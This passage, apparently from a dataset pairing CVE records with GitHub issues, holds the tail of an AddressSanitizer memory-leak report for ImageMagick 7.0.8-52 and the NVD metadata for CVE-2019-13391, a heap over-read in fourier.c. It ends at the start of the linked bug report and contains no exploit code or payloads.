#14 0x5268e1 in main utilities/magick.c:180:10
#15 0x7f120b60bb96 in __libc_start_main /build/glibc-OTsEL5/glibc-2.27/csu/../csu/libc-start.c:310
Indirect leak of 512 byte(s) in 1 object(s) allocated from:
#0 0x4e5397 in malloc (install/bin/magick+0x4e5397)
#1 0x7f121156ec16 in AcquireMagickMemory MagickCore/memory.c:478:10
#2 0x7f121156ec7f in AcquireQuantumMemory MagickCore/memory.c:551:10
#3 0x7f12115afa4a in AcquirePixelChannelMap MagickCore/pixel.c:101:35
#4 0x7f12115afc24 in ClonePixelChannelMap MagickCore/pixel.c:139:13
#5 0x7f1211520d8f in CloneImage MagickCore/image.c:849:28
#6 0x7f12112ce94b in CombineImages MagickCore/channel.c:520:17
#7 0x7f1210cfc574 in CLIListOperatorImages MagickWand/operation.c:3848:22
#8 0x7f1210d0839e in CLIOption MagickWand/operation.c:5282:14
#9 0x7f1210b49a99 in ProcessCommandOptions MagickWand/magick-cli.c:477:7
#10 0x7f1210b4ad0a in MagickImageCommand MagickWand/magick-cli.c:796:5
#11 0x7f1210b94ba1 in MagickCommandGenesis MagickWand/mogrify.c:185:14
#12 0x526f95 in MagickMain utilities/magick.c:149:10
#13 0x5268e1 in main utilities/magick.c:180:10
#14 0x7f120b60bb96 in __libc_start_main /build/glibc-OTsEL5/glibc-2.27/csu/../csu/libc-start.c:310
Indirect leak of 288 byte(s) in 1 object(s) allocated from:
#0 0x4e5397 in malloc (install/bin/magick+0x4e5397)
#1 0x7f121156ec16 in AcquireMagickMemory MagickCore/memory.c:478:10
#2 0x7f121127eb74 in AcquireCriticalMemory ./MagickCore/memory-private.h:64:10
#3 0x7f121128064d in CloneBlobInfo MagickCore/blob.c:554:27
#4 0x7f1211521248 in CloneImage MagickCore/image.c:867:25
#5 0x7f12112ce94b in CombineImages MagickCore/channel.c:520:17
#6 0x7f1210cfc574 in CLIListOperatorImages MagickWand/operation.c:3848:22
#7 0x7f1210d0839e in CLIOption MagickWand/operation.c:5282:14
#8 0x7f1210b49a99 in ProcessCommandOptions MagickWand/magick-cli.c:477:7
#9 0x7f1210b4ad0a in MagickImageCommand MagickWand/magick-cli.c:796:5
#10 0x7f1210b94ba1 in MagickCommandGenesis MagickWand/mogrify.c:185:14
#11 0x526f95 in MagickMain utilities/magick.c:149:10
#12 0x5268e1 in main utilities/magick.c:180:10
#13 0x7f120b60bb96 in __libc_start_main /build/glibc-OTsEL5/glibc-2.27/csu/../csu/libc-start.c:310
Indirect leak of 192 byte(s) in 1 object(s) allocated from:
#0 0x4e5397 in malloc (install/bin/magick+0x4e5397)
#1 0x7f121156ec16 in AcquireMagickMemory MagickCore/memory.c:478:10
#2 0x7f121156ec7f in AcquireQuantumMemory MagickCore/memory.c:551:10
#3 0x7f12112a1daf in AcquirePixelCacheNexus MagickCore/cache.c:271:29
#4 0x7f12112a175d in AcquirePixelCache MagickCore/cache.c:212:26
#5 0x7f12112a275d in ClonePixelCache MagickCore/cache.c:515:28
#6 0x7f12112bcf3b in GetImagePixelCache MagickCore/cache.c:1724:29
#7 0x7f12112c35b9 in SyncImagePixelCache MagickCore/cache.c:5499:28
#8 0x7f12115222c1 in SetImageStorageClass MagickCore/image.c:2627:10
#9 0x7f12112ce980 in CombineImages MagickCore/channel.c:523:7
#10 0x7f1210cfc574 in CLIListOperatorImages MagickWand/operation.c:3848:22
#11 0x7f1210d0839e in CLIOption MagickWand/operation.c:5282:14
#12 0x7f1210b49a99 in ProcessCommandOptions MagickWand/magick-cli.c:477:7
#13 0x7f1210b4ad0a in MagickImageCommand MagickWand/magick-cli.c:796:5
#14 0x7f1210b94ba1 in MagickCommandGenesis MagickWand/mogrify.c:185:14
#15 0x526f95 in MagickMain utilities/magick.c:149:10
#16 0x5268e1 in main utilities/magick.c:180:10
#17 0x7f120b60bb96 in __libc_start_main /build/glibc-OTsEL5/glibc-2.27/csu/../csu/libc-start.c:310
Indirect leak of 128 byte(s) in 4 object(s) allocated from:
#0 0x4e5397 in malloc (install/bin/magick+0x4e5397)
#1 0x7f121156ec16 in AcquireMagickMemory MagickCore/memory.c:478:10
#2 0x7f12116c9dd3 in AddValueToSplayTree MagickCore/splay-tree.c:189:21
#3 0x7f12116cacdc in CloneSplayTree MagickCore/splay-tree.c:372:12
#4 0x7f12115a03d0 in CloneImageOptions MagickCore/option.c:2144:27
#5 0x7f1211528a58 in CloneImageInfo MagickCore/image.c:1010:10
#6 0x7f121151e0b8 in SyncImageSettings MagickCore/image.c:4242:21
#7 0x7f12115358a6 in SyncImagesSettings MagickCore/image.c:4000:12
#8 0x7f1210d081a3 in CLIOption MagickWand/operation.c:5249:14
#9 0x7f1210b49a99 in ProcessCommandOptions MagickWand/magick-cli.c:477:7
#10 0x7f1210b4ad0a in MagickImageCommand MagickWand/magick-cli.c:796:5
#11 0x7f1210b94ba1 in MagickCommandGenesis MagickWand/mogrify.c:185:14
#12 0x526f95 in MagickMain utilities/magick.c:149:10
#13 0x5268e1 in main utilities/magick.c:180:10
#14 0x7f120b60bb96 in __libc_start_main /build/glibc-OTsEL5/glibc-2.27/csu/../csu/libc-start.c:310
Indirect leak of 128 byte(s) in 4 object(s) allocated from:
#0 0x4e5397 in malloc (install/bin/magick+0x4e5397)
#1 0x7f121156ec16 in AcquireMagickMemory MagickCore/memory.c:478:10
#2 0x7f12116c9dd3 in AddValueToSplayTree MagickCore/splay-tree.c:189:21
#3 0x7f12116cacdc in CloneSplayTree MagickCore/splay-tree.c:372:12
#4 0x7f12115ff9f3 in CloneImageProperties MagickCore/property.c:196:25
#5 0x7f1211520999 in CloneImage MagickCore/image.c:839:10
#6 0x7f12112ce94b in CombineImages MagickCore/channel.c:520:17
#7 0x7f1210cfc574 in CLIListOperatorImages MagickWand/operation.c:3848:22
#8 0x7f1210d0839e in CLIOption MagickWand/operation.c:5282:14
#9 0x7f1210b49a99 in ProcessCommandOptions MagickWand/magick-cli.c:477:7
#10 0x7f1210b4ad0a in MagickImageCommand MagickWand/magick-cli.c:796:5
#11 0x7f1210b94ba1 in MagickCommandGenesis MagickWand/mogrify.c:185:14
#12 0x526f95 in MagickMain utilities/magick.c:149:10
#13 0x5268e1 in main utilities/magick.c:180:10
#14 0x7f120b60bb96 in __libc_start_main /build/glibc-OTsEL5/glibc-2.27/csu/../csu/libc-start.c:310
Indirect leak of 115 byte(s) in 4 object(s) allocated from:
#0 0x4e5397 in malloc (install/bin/magick+0x4e5397)
#1 0x7f121156ec16 in AcquireMagickMemory MagickCore/memory.c:478:10
#2 0x7f121156ec7f in AcquireQuantumMemory MagickCore/memory.c:551:10
#3 0x7f12117027c3 in ConstantString MagickCore/string.c:713:26
#4 0x7f12116cacc6 in CloneSplayTree MagickCore/splay-tree.c:373:7
#5 0x7f12115ff9f3 in CloneImageProperties MagickCore/property.c:196:25
#6 0x7f1211520999 in CloneImage MagickCore/image.c:839:10
#7 0x7f12112ce94b in CombineImages MagickCore/channel.c:520:17
#8 0x7f1210cfc574 in CLIListOperatorImages MagickWand/operation.c:3848:22
#9 0x7f1210d0839e in CLIOption MagickWand/operation.c:5282:14
#10 0x7f1210b49a99 in ProcessCommandOptions MagickWand/magick-cli.c:477:7
#11 0x7f1210b4ad0a in MagickImageCommand MagickWand/magick-cli.c:796:5
#12 0x7f1210b94ba1 in MagickCommandGenesis MagickWand/mogrify.c:185:14
#13 0x526f95 in MagickMain utilities/magick.c:149:10
#14 0x5268e1 in main utilities/magick.c:180:10
#15 0x7f120b60bb96 in __libc_start_main /build/glibc-OTsEL5/glibc-2.27/csu/../csu/libc-start.c:310
Indirect leak of 88 byte(s) in 1 object(s) allocated from:
#0 0x4e5397 in malloc (install/bin/magick+0x4e5397)
#1 0x7f121156ec16 in AcquireMagickMemory MagickCore/memory.c:478:10
#2 0x7f12116cee24 in AcquireCriticalMemory ./MagickCore/memory-private.h:64:10
#3 0x7f12116caeb5 in NewSplayTree MagickCore/splay-tree.c:1148:32
#4 0x7f12116caac4 in CloneSplayTree MagickCore/splay-tree.c:360:14
#5 0x7f12115ff9f3 in CloneImageProperties MagickCore/property.c:196:25
#6 0x7f1211520999 in CloneImage MagickCore/image.c:839:10
#7 0x7f12112ce94b in CombineImages MagickCore/channel.c:520:17
#8 0x7f1210cfc574 in CLIListOperatorImages MagickWand/operation.c:3848:22
#9 0x7f1210d0839e in CLIOption MagickWand/operation.c:5282:14
#10 0x7f1210b49a99 in ProcessCommandOptions MagickWand/magick-cli.c:477:7
#11 0x7f1210b4ad0a in MagickImageCommand MagickWand/magick-cli.c:796:5
#12 0x7f1210b94ba1 in MagickCommandGenesis MagickWand/mogrify.c:185:14
#13 0x526f95 in MagickMain utilities/magick.c:149:10
#14 0x5268e1 in main utilities/magick.c:180:10
#15 0x7f120b60bb96 in __libc_start_main /build/glibc-OTsEL5/glibc-2.27/csu/../csu/libc-start.c:310
Indirect leak of 88 byte(s) in 1 object(s) allocated from:
#0 0x4e5397 in malloc (install/bin/magick+0x4e5397)
#1 0x7f121156ec16 in AcquireMagickMemory MagickCore/memory.c:478:10
#2 0x7f12116cee24 in AcquireCriticalMemory ./MagickCore/memory-private.h:64:10
#3 0x7f12116caeb5 in NewSplayTree MagickCore/splay-tree.c:1148:32
#4 0x7f12116caac4 in CloneSplayTree MagickCore/splay-tree.c:360:14
#5 0x7f12115a03d0 in CloneImageOptions MagickCore/option.c:2144:27
#6 0x7f1211528a58 in CloneImageInfo MagickCore/image.c:1010:10
#7 0x7f121151e0b8 in SyncImageSettings MagickCore/image.c:4242:21
#8 0x7f12115358a6 in SyncImagesSettings MagickCore/image.c:4000:12
#9 0x7f1210d081a3 in CLIOption MagickWand/operation.c:5249:14
#10 0x7f1210b49a99 in ProcessCommandOptions MagickWand/magick-cli.c:477:7
#11 0x7f1210b4ad0a in MagickImageCommand MagickWand/magick-cli.c:796:5
#12 0x7f1210b94ba1 in MagickCommandGenesis MagickWand/mogrify.c:185:14
#13 0x526f95 in MagickMain utilities/magick.c:149:10
#14 0x5268e1 in main utilities/magick.c:180:10
#15 0x7f120b60bb96 in __libc_start_main /build/glibc-OTsEL5/glibc-2.27/csu/../csu/libc-start.c:310
Indirect leak of 88 byte(s) in 1 object(s) allocated from:
#0 0x4e5397 in malloc (install/bin/magick+0x4e5397)
#1 0x7f121156ec16 in AcquireMagickMemory MagickCore/memory.c:478:10
#2 0x7f12116cee24 in AcquireCriticalMemory ./MagickCore/memory-private.h:64:10
#3 0x7f12116caeb5 in NewSplayTree MagickCore/splay-tree.c:1148:32
#4 0x7f12116caac4 in CloneSplayTree MagickCore/splay-tree.c:360:14
#5 0x7f1211272c4a in CloneImageArtifacts MagickCore/artifact.c:118:24
#6 0x7f12115209ac in CloneImage MagickCore/image.c:840:10
#7 0x7f12112ce94b in CombineImages MagickCore/channel.c:520:17
#8 0x7f1210cfc574 in CLIListOperatorImages MagickWand/operation.c:3848:22
#9 0x7f1210d0839e in CLIOption MagickWand/operation.c:5282:14
#10 0x7f1210b49a99 in ProcessCommandOptions MagickWand/magick-cli.c:477:7
#11 0x7f1210b4ad0a in MagickImageCommand MagickWand/magick-cli.c:796:5
#12 0x7f1210b94ba1 in MagickCommandGenesis MagickWand/mogrify.c:185:14
#13 0x526f95 in MagickMain utilities/magick.c:149:10
#14 0x5268e1 in main utilities/magick.c:180:10
#15 0x7f120b60bb96 in __libc_start_main /build/glibc-OTsEL5/glibc-2.27/csu/../csu/libc-start.c:310
Indirect leak of 64 byte(s) in 1 object(s) allocated from:
#0 0x4e6200 in posix_memalign (install/bin/magick+0x4e6200)
#1 0x7f12116b4521 in AcquireSemaphoreMemory MagickCore/semaphore.c:154:7
#2 0x7f12116b3d63 in AcquireSemaphoreInfo MagickCore/semaphore.c:200:36
#3 0x7f12112a1ac4 in AcquirePixelCache MagickCore/cache.c:229:25
#4 0x7f12112a275d in ClonePixelCache MagickCore/cache.c:515:28
#5 0x7f12112bcf3b in GetImagePixelCache MagickCore/cache.c:1724:29
#6 0x7f12112c35b9 in SyncImagePixelCache MagickCore/cache.c:5499:28
#7 0x7f12115222c1 in SetImageStorageClass MagickCore/image.c:2627:10
#8 0x7f12112ce980 in CombineImages MagickCore/channel.c:523:7
#9 0x7f1210cfc574 in CLIListOperatorImages MagickWand/operation.c:3848:22
#10 0x7f1210d0839e in CLIOption MagickWand/operation.c:5282:14
#11 0x7f1210b49a99 in ProcessCommandOptions MagickWand/magick-cli.c:477:7
#12 0x7f1210b4ad0a in MagickImageCommand MagickWand/magick-cli.c:796:5
#13 0x7f1210b94ba1 in MagickCommandGenesis MagickWand/mogrify.c:185:14
#14 0x526f95 in MagickMain utilities/magick.c:149:10
#15 0x5268e1 in main utilities/magick.c:180:10
#16 0x7f120b60bb96 in __libc_start_main /build/glibc-OTsEL5/glibc-2.27/csu/../csu/libc-start.c:310
Indirect leak of 64 byte(s) in 1 object(s) allocated from:
#0 0x4e6200 in posix_memalign (install/bin/magick+0x4e6200)
#1 0x7f121156ea36 in AcquireAlignedMemory MagickCore/memory.c:265:7
#2 0x7f12112a1cb2 in AcquirePixelCacheNexus MagickCore/cache.c:267:29
#3 0x7f12112a175d in AcquirePixelCache MagickCore/cache.c:212:26
#4 0x7f12112a275d in ClonePixelCache MagickCore/cache.c:515:28
#5 0x7f12112bcf3b in GetImagePixelCache MagickCore/cache.c:1724:29
#6 0x7f12112c35b9 in SyncImagePixelCache MagickCore/cache.c:5499:28
#7 0x7f12115222c1 in SetImageStorageClass MagickCore/image.c:2627:10
#8 0x7f12112ce980 in CombineImages MagickCore/channel.c:523:7
#9 0x7f1210cfc574 in CLIListOperatorImages MagickWand/operation.c:3848:22
#10 0x7f1210d0839e in CLIOption MagickWand/operation.c:5282:14
#11 0x7f1210b49a99 in ProcessCommandOptions MagickWand/magick-cli.c:477:7
#12 0x7f1210b4ad0a in MagickImageCommand MagickWand/magick-cli.c:796:5
#13 0x7f1210b94ba1 in MagickCommandGenesis MagickWand/mogrify.c:185:14
#14 0x526f95 in MagickMain utilities/magick.c:149:10
#15 0x5268e1 in main utilities/magick.c:180:10
#16 0x7f120b60bb96 in __libc_start_main /build/glibc-OTsEL5/glibc-2.27/csu/../csu/libc-start.c:310
Indirect leak of 64 byte(s) in 1 object(s) allocated from:
#0 0x4e6200 in posix_memalign (install/bin/magick+0x4e6200)
#1 0x7f12116b4521 in AcquireSemaphoreMemory MagickCore/semaphore.c:154:7
#2 0x7f12116b3d63 in AcquireSemaphoreInfo MagickCore/semaphore.c:200:36
#3 0x7f12115213df in CloneImage MagickCore/image.c:871:26
#4 0x7f12112ce94b in CombineImages MagickCore/channel.c:520:17
#5 0x7f1210cfc574 in CLIListOperatorImages MagickWand/operation.c:3848:22
#6 0x7f1210d0839e in CLIOption MagickWand/operation.c:5282:14
#7 0x7f1210b49a99 in ProcessCommandOptions MagickWand/magick-cli.c:477:7
#8 0x7f1210b4ad0a in MagickImageCommand MagickWand/magick-cli.c:796:5
#9 0x7f1210b94ba1 in MagickCommandGenesis MagickWand/mogrify.c:185:14
#10 0x526f95 in MagickMain utilities/magick.c:149:10
#11 0x5268e1 in main utilities/magick.c:180:10
#12 0x7f120b60bb96 in __libc_start_main /build/glibc-OTsEL5/glibc-2.27/csu/../csu/libc-start.c:310
Indirect leak of 64 byte(s) in 1 object(s) allocated from:
#0 0x4e6200 in posix_memalign (install/bin/magick+0x4e6200)
#1 0x7f12116b4521 in AcquireSemaphoreMemory MagickCore/semaphore.c:154:7
#2 0x7f12116b3d63 in AcquireSemaphoreInfo MagickCore/semaphore.c:200:36
#3 0x7f1211280a9e in GetBlobInfo MagickCore/blob.c:1745:24
#4 0x7f121128065a in CloneBlobInfo MagickCore/blob.c:555:3
#5 0x7f1211521248 in CloneImage MagickCore/image.c:867:25
#6 0x7f12112ce94b in CombineImages MagickCore/channel.c:520:17
#7 0x7f1210cfc574 in CLIListOperatorImages MagickWand/operation.c:3848:22
#8 0x7f1210d0839e in CLIOption MagickWand/operation.c:5282:14
#9 0x7f1210b49a99 in ProcessCommandOptions MagickWand/magick-cli.c:477:7
#10 0x7f1210b4ad0a in MagickImageCommand MagickWand/magick-cli.c:796:5
#11 0x7f1210b94ba1 in MagickCommandGenesis MagickWand/mogrify.c:185:14
#12 0x526f95 in MagickMain utilities/magick.c:149:10
#13 0x5268e1 in main utilities/magick.c:180:10
#14 0x7f120b60bb96 in __libc_start_main /build/glibc-OTsEL5/glibc-2.27/csu/../csu/libc-start.c:310
Indirect leak of 64 byte(s) in 1 object(s) allocated from:
#0 0x4e6200 in posix_memalign (install/bin/magick+0x4e6200)
#1 0x7f12116b4521 in AcquireSemaphoreMemory MagickCore/semaphore.c:154:7
#2 0x7f12116b3d63 in AcquireSemaphoreInfo MagickCore/semaphore.c:200:36
#3 0x7f12116cb129 in NewSplayTree MagickCore/splay-tree.c:1159:25
#4 0x7f12116caac4 in CloneSplayTree MagickCore/splay-tree.c:360:14
#5 0x7f1211272c4a in CloneImageArtifacts MagickCore/artifact.c:118:24
#6 0x7f12115209ac in CloneImage MagickCore/image.c:840:10
#7 0x7f12112ce94b in CombineImages MagickCore/channel.c:520:17
#8 0x7f1210cfc574 in CLIListOperatorImages MagickWand/operation.c:3848:22
#9 0x7f1210d0839e in CLIOption MagickWand/operation.c:5282:14
#10 0x7f1210b49a99 in ProcessCommandOptions MagickWand/magick-cli.c:477:7
#11 0x7f1210b4ad0a in MagickImageCommand MagickWand/magick-cli.c:796:5
#12 0x7f1210b94ba1 in MagickCommandGenesis MagickWand/mogrify.c:185:14
#13 0x526f95 in MagickMain utilities/magick.c:149:10
#14 0x5268e1 in main utilities/magick.c:180:10
#15 0x7f120b60bb96 in __libc_start_main /build/glibc-OTsEL5/glibc-2.27/csu/../csu/libc-start.c:310
Indirect leak of 64 byte(s) in 1 object(s) allocated from:
#0 0x4e6200 in posix_memalign (install/bin/magick+0x4e6200)
#1 0x7f12116b4521 in AcquireSemaphoreMemory MagickCore/semaphore.c:154:7
#2 0x7f12116b3d63 in AcquireSemaphoreInfo MagickCore/semaphore.c:200:36
#3 0x7f12116cb129 in NewSplayTree MagickCore/splay-tree.c:1159:25
#4 0x7f12116caac4 in CloneSplayTree MagickCore/splay-tree.c:360:14
#5 0x7f12115ff9f3 in CloneImageProperties MagickCore/property.c:196:25
#6 0x7f1211520999 in CloneImage MagickCore/image.c:839:10
#7 0x7f12112ce94b in CombineImages MagickCore/channel.c:520:17
#8 0x7f1210cfc574 in CLIListOperatorImages MagickWand/operation.c:3848:22
#9 0x7f1210d0839e in CLIOption MagickWand/operation.c:5282:14
#10 0x7f1210b49a99 in ProcessCommandOptions MagickWand/magick-cli.c:477:7
#11 0x7f1210b4ad0a in MagickImageCommand MagickWand/magick-cli.c:796:5
#12 0x7f1210b94ba1 in MagickCommandGenesis MagickWand/mogrify.c:185:14
#13 0x526f95 in MagickMain utilities/magick.c:149:10
#14 0x5268e1 in main utilities/magick.c:180:10
#15 0x7f120b60bb96 in __libc_start_main /build/glibc-OTsEL5/glibc-2.27/csu/../csu/libc-start.c:310
Indirect leak of 64 byte(s) in 1 object(s) allocated from:
#0 0x4e6200 in posix_memalign (install/bin/magick+0x4e6200)
#1 0x7f12116b4521 in AcquireSemaphoreMemory MagickCore/semaphore.c:154:7
#2 0x7f12116b3d63 in AcquireSemaphoreInfo MagickCore/semaphore.c:200:36
#3 0x7f12116cb129 in NewSplayTree MagickCore/splay-tree.c:1159:25
#4 0x7f12116caac4 in CloneSplayTree MagickCore/splay-tree.c:360:14
#5 0x7f12115a03d0 in CloneImageOptions MagickCore/option.c:2144:27
#6 0x7f1211528a58 in CloneImageInfo MagickCore/image.c:1010:10
#7 0x7f121151e0b8 in SyncImageSettings MagickCore/image.c:4242:21
#8 0x7f12115358a6 in SyncImagesSettings MagickCore/image.c:4000:12
#9 0x7f1210d081a3 in CLIOption MagickWand/operation.c:5249:14
#10 0x7f1210b49a99 in ProcessCommandOptions MagickWand/magick-cli.c:477:7
#11 0x7f1210b4ad0a in MagickImageCommand MagickWand/magick-cli.c:796:5
#12 0x7f1210b94ba1 in MagickCommandGenesis MagickWand/mogrify.c:185:14
#13 0x526f95 in MagickMain utilities/magick.c:149:10
#14 0x5268e1 in main utilities/magick.c:180:10
#15 0x7f120b60bb96 in __libc_start_main /build/glibc-OTsEL5/glibc-2.27/csu/../csu/libc-start.c:310
Indirect leak of 64 byte(s) in 1 object(s) allocated from:
#0 0x4e6200 in posix_memalign (install/bin/magick+0x4e6200)
#1 0x7f12116b4521 in AcquireSemaphoreMemory MagickCore/semaphore.c:154:7
#2 0x7f12116b3d63 in AcquireSemaphoreInfo MagickCore/semaphore.c:200:36
#3 0x7f12112a1b53 in AcquirePixelCache MagickCore/cache.c:231:30
#4 0x7f12112a275d in ClonePixelCache MagickCore/cache.c:515:28
#5 0x7f12112bcf3b in GetImagePixelCache MagickCore/cache.c:1724:29
#6 0x7f12112c35b9 in SyncImagePixelCache MagickCore/cache.c:5499:28
#7 0x7f12115222c1 in SetImageStorageClass MagickCore/image.c:2627:10
#8 0x7f12112ce980 in CombineImages MagickCore/channel.c:523:7
#9 0x7f1210cfc574 in CLIListOperatorImages MagickWand/operation.c:3848:22
#10 0x7f1210d0839e in CLIOption MagickWand/operation.c:5282:14
#11 0x7f1210b49a99 in ProcessCommandOptions MagickWand/magick-cli.c:477:7
#12 0x7f1210b4ad0a in MagickImageCommand MagickWand/magick-cli.c:796:5
#13 0x7f1210b94ba1 in MagickCommandGenesis MagickWand/mogrify.c:185:14
#14 0x526f95 in MagickMain utilities/magick.c:149:10
#15 0x5268e1 in main utilities/magick.c:180:10
#16 0x7f120b60bb96 in __libc_start_main /build/glibc-OTsEL5/glibc-2.27/csu/../csu/libc-start.c:310
Indirect leak of 46 byte(s) in 4 object(s) allocated from:
#0 0x4e5397 in malloc (install/bin/magick+0x4e5397)
#1 0x7f121156ec16 in AcquireMagickMemory MagickCore/memory.c:478:10
#2 0x7f121156ec7f in AcquireQuantumMemory MagickCore/memory.c:551:10
#3 0x7f12117027c3 in ConstantString MagickCore/string.c:713:26
#4 0x7f12116cacc6 in CloneSplayTree MagickCore/splay-tree.c:373:7
#5 0x7f12115a03d0 in CloneImageOptions MagickCore/option.c:2144:27
#6 0x7f1211528a58 in CloneImageInfo MagickCore/image.c:1010:10
#7 0x7f121151e0b8 in SyncImageSettings MagickCore/image.c:4242:21
#8 0x7f12115358a6 in SyncImagesSettings MagickCore/image.c:4000:12
#9 0x7f1210d081a3 in CLIOption MagickWand/operation.c:5249:14
#10 0x7f1210b49a99 in ProcessCommandOptions MagickWand/magick-cli.c:477:7
#11 0x7f1210b4ad0a in MagickImageCommand MagickWand/magick-cli.c:796:5
#12 0x7f1210b94ba1 in MagickCommandGenesis MagickWand/mogrify.c:185:14
#13 0x526f95 in MagickMain utilities/magick.c:149:10
#14 0x5268e1 in main utilities/magick.c:180:10
#15 0x7f120b60bb96 in __libc_start_main /build/glibc-OTsEL5/glibc-2.27/csu/../csu/libc-start.c:310
Indirect leak of 38 byte(s) in 4 object(s) allocated from:
#0 0x4e5397 in malloc (install/bin/magick+0x4e5397)
#1 0x7f121156ec16 in AcquireMagickMemory MagickCore/memory.c:478:10
#2 0x7f121156ec7f in AcquireQuantumMemory MagickCore/memory.c:551:10
#3 0x7f12117027c3 in ConstantString MagickCore/string.c:713:26
#4 0x7f12116cac41 in CloneSplayTree MagickCore/splay-tree.c:372:43
#5 0x7f12115ff9f3 in CloneImageProperties MagickCore/property.c:196:25
#6 0x7f1211520999 in CloneImage MagickCore/image.c:839:10
#7 0x7f12112ce94b in CombineImages MagickCore/channel.c:520:17
#8 0x7f1210cfc574 in CLIListOperatorImages MagickWand/operation.c:3848:22
#9 0x7f1210d0839e in CLIOption MagickWand/operation.c:5282:14
#10 0x7f1210b49a99 in ProcessCommandOptions MagickWand/magick-cli.c:477:7
#11 0x7f1210b4ad0a in MagickImageCommand MagickWand/magick-cli.c:796:5
#12 0x7f1210b94ba1 in MagickCommandGenesis MagickWand/mogrify.c:185:14
#13 0x526f95 in MagickMain utilities/magick.c:149:10
#14 0x5268e1 in main utilities/magick.c:180:10
#15 0x7f120b60bb96 in __libc_start_main /build/glibc-OTsEL5/glibc-2.27/csu/../csu/libc-start.c:310
Indirect leak of 29 byte(s) in 4 object(s) allocated from:
#0 0x4e5397 in malloc (install/bin/magick+0x4e5397)
#1 0x7f121156ec16 in AcquireMagickMemory MagickCore/memory.c:478:10
#2 0x7f121156ec7f in AcquireQuantumMemory MagickCore/memory.c:551:10
#3 0x7f12117027c3 in ConstantString MagickCore/string.c:713:26
#4 0x7f12116cac41 in CloneSplayTree MagickCore/splay-tree.c:372:43
#5 0x7f12115a03d0 in CloneImageOptions MagickCore/option.c:2144:27
#6 0x7f1211528a58 in CloneImageInfo MagickCore/image.c:1010:10
#7 0x7f121151e0b8 in SyncImageSettings MagickCore/image.c:4242:21
#8 0x7f12115358a6 in SyncImagesSettings MagickCore/image.c:4000:12
#9 0x7f1210d081a3 in CLIOption MagickWand/operation.c:5249:14
#10 0x7f1210b49a99 in ProcessCommandOptions MagickWand/magick-cli.c:477:7
#11 0x7f1210b4ad0a in MagickImageCommand MagickWand/magick-cli.c:796:5
#12 0x7f1210b94ba1 in MagickCommandGenesis MagickWand/mogrify.c:185:14
#13 0x526f95 in MagickMain utilities/magick.c:149:10
#14 0x5268e1 in main utilities/magick.c:180:10
#15 0x7f120b60bb96 in __libc_start_main /build/glibc-OTsEL5/glibc-2.27/csu/../csu/libc-start.c:310
SUMMARY: AddressSanitizer: 3746948 byte(s) leaked in 43 allocation(s).
```
### System Configuration
<!-- Tell us about the environment where you are experiencing the bug -->
- ImageMagick version:
ImageMagick 7.0.8-52 Q16 x86_64 2019-07-02 https://imagemagick.org
- Environment (Operating system, version and so on):
Description: Ubuntu 18.04.1 LTS
Release: 18.04
Codename: bionic
- Additional information:
CC=clang-7 CXX=clang++-7 ./configure --disable-openmp --without-png
and I also tested on Ubuntu 16.04 with clang-3.8 and gcc-5.
<!-- Thanks for reporting the issue to ImageMagick! -->
| memory leaks is detected at AcquireMagickMemory | https://api.github.com/repos/ImageMagick/ImageMagick/issues/1623/comments | 3 | 2019-07-01T18:19:43Z | 2019-07-08T10:31:06Z | https://github.com/ImageMagick/ImageMagick/issues/1623 | 462,846,647 | 1,623 |
CVE-2019-13391 | 2019-07-07T22:15:10.503 | In ImageMagick 7.0.8-50 Q16, ComplexImages in MagickCore/fourier.c has a heap-based buffer over-read because of incorrect calls to GetCacheViewVirtualPixels. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "[email protected]",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.0"
},
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"source": "[email protected]",
"type": "Primary"
}
],
"cvssMetricV31": null
} | [
{
"source": "[email protected]",
"tags": null,
"url": "http://lists.opensuse.org/opensuse-security-announce/2019-08/msg00069.html"
},
{
"source": "[email protected]",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/ImageMagick/ImageMagick/commit/7c2c5ba5b8e3a0b2b82f56c71dfab74ed4006df7"
},
{
"source": "[email protected]",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/ImageMagick/ImageMagick/issues/1588"
},
{
"source": "[email protected]",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/ImageMagick/ImageMagick6/commit/f6ffc702c6eecd963587273a429dcd608c648984"
},
{
"source": "[email protected]",
"tags": null,
"url": "https://lists.debian.org/debian-lts-announce/2020/09/msg00007.html"
},
{
"source": "[email protected]",
"tags": null,
"url": "https://usn.ubuntu.com/4192-1/"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:imagemagick:imagemagick:7.0.8-50:q16:*:*:*:*:*:*",
"matchCriteriaId": "25CCEA99-8329-46C6-9625-4FE15F24CF69",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | https://github.com/ImageMagick/ImageMagick/issues/1588 | [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
] | github.com | [
"ImageMagick",
"ImageMagick"
] | ### Prerequisites
- [x] I have written a descriptive issue title
- [x] I have verified that I am using the latest version of ImageMagick
- [x] I have searched [open](https://github.com/ImageMagick/ImageMagick/issues) and [closed](https://github.com/ImageMagick/ImageMagick/issues?q=is%3Aissue+is%3Aclosed) issues to ensure it has not already been reported
### Description
<!-- A description of the bug or feature -->
There is a heap buffer overflow in MagickCore/fourier.c:314:19 in .omp_outlined._debug__
